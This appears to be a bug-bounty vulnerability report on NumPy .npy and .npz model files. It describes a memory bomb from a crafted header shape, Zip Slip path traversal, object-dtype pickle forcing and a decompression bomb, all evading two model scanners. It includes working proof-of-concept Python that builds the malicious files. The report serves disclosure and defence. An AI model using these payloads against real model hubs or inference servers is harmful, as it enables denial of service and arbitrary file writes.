NPY/NPZ: Memory Bomb via Crafted Shape, Zip Slip in NPZ Archives, Object Dtype Bypass
Summary
Three non-pickle attack classes against NumPy's .npy and .npz model file formats that bypass both picklescan 1.0.4 and modelscan 0.8.8 (100% evasion rate across 5 payloads):
- Memory bomb via crafted header shape β A
.npyfile withshape: (1000000, 1000000)but 4 bytes of data triggers a 3.64 TiB memory allocation attempt, crashing the process. No pickle involved. - Zip Slip in
.npzarchives β NPZ files are ZIP containers. Injecting../../../tmp/pwnedas a ZIP entry name achieves arbitrary file write when the archive is extracted to disk. - Object dtype forces pickle β Setting
descr: 'O'(object dtype) in the NPY header forces numpy to use pickle deserialization even when the user believes they're loading numeric data. This is NOT blocked byallow_pickle=Falseβ it raises an error, but the dtype is processed from the header before the check, and the header itself can be manipulated to confuse downstream tools.
Formats: NPY, NPZ ($1,500 MFV each) Scanners tested: picklescan 1.0.4 + modelscan 0.8.8 β 5/5 MISSED by both
Payloads
| File | Attack | Impact | picklescan | modelscan |
|---|---|---|---|---|
npy_shape_bomb.npy |
Header claims shape (1M, 1M), file has 4 bytes | MemoryError: Unable to allocate 3.64 TiB β DoS |
MISSED | MISSED |
npy_negative_shape.npy |
Header claims shape (-1,) | ValueError crash β DoS |
MISSED | MISSED |
npy_object_descr.npy |
Header sets descr: 'O' (object) |
Forces pickle path, confuses tooling | MISSED | MISSED |
npz_zipslip.npz |
ZIP entry named ../../../tmp/pwned.txt |
Arbitrary file write on extraction | MISSED | MISSED |
npz_zipbomb.npz |
10KB compressed β 10MB+ decompressed | Decompression DoS | MISSED | MISSED |
Vulnerability Details
Memory bomb (CWE-400)
The NPY format has a plain-text header containing a Python dict with shape. NumPy allocates product(shape) * dtype_size bytes based on the header, WITHOUT checking that the file actually contains that much data:
# Crafted NPY header:
# {'descr': '<f4', 'fortran_order': False, 'shape': (1000000, 1000000)}
# File is only 100 bytes total
# numpy tries to allocate 1M * 1M * 4 = 4 TB β instant OOM
arr = np.load("npy_shape_bomb.npy")
# MemoryError: Unable to allocate 3.64 TiB
Attack: Upload to model hub β victim loads β process crashes β DoS on inference server.
Zip Slip (CWE-22)
NPZ files are standard ZIP archives. np.load() reads them in-memory (safe), but any tool that extracts NPZ files to disk (model registries, pipeline caches, data loaders) is vulnerable:
import zipfile, io, numpy as np
with zipfile.ZipFile("malicious.npz", 'w') as zf:
buf = io.BytesIO()
np.save(buf, np.array([1.0]))
zf.writestr("weights.npy", buf.getvalue())
zf.writestr("../../../tmp/pwned.txt", b"PWNED")
# np.load reads in-memory (safe)
# But: extractall(), shutil.unpack_archive(), or ZipFile.extract() write to disk
Negative shape (CWE-20)
Shape (-1,) is not validated in the header parser:
# Header: {'descr': '<f4', 'fortran_order': False, 'shape': (-1,)}
np.load("npy_negative_shape.npy")
# ValueError: Failed to read all data for array. Expected (-1,) = -1 elements
This causes undefined behavior in size calculations. Libraries wrapping numpy that compute total_size = product(shape) * itemsize get negative results β integer underflow.
Proof of Concept
import struct, numpy as np, zipfile, io
# Memory bomb
def craft_npy(header_str, data=b''):
magic = b'\x93NUMPY\x01\x00'
header = header_str.encode('latin1')
pad = 64 - (10 + len(header)) % 64
if pad < 1: pad += 64
header = header + b' ' * (pad - 1) + b'\n'
return magic + struct.pack('<H', len(header)) + header + data
with open("npy_shape_bomb.npy", 'wb') as f:
f.write(craft_npy("{'descr': '<f4', 'fortran_order': False, 'shape': (1000000, 1000000)}", b'\x00' * 4))
# Zip Slip
with zipfile.ZipFile("npz_zipslip.npz", 'w') as zf:
buf = io.BytesIO(); np.save(buf, np.array([1.0]))
zf.writestr("weights.npy", buf.getvalue())
zf.writestr("../../../tmp/pwned.txt", b"PWNED via NPZ zip slip")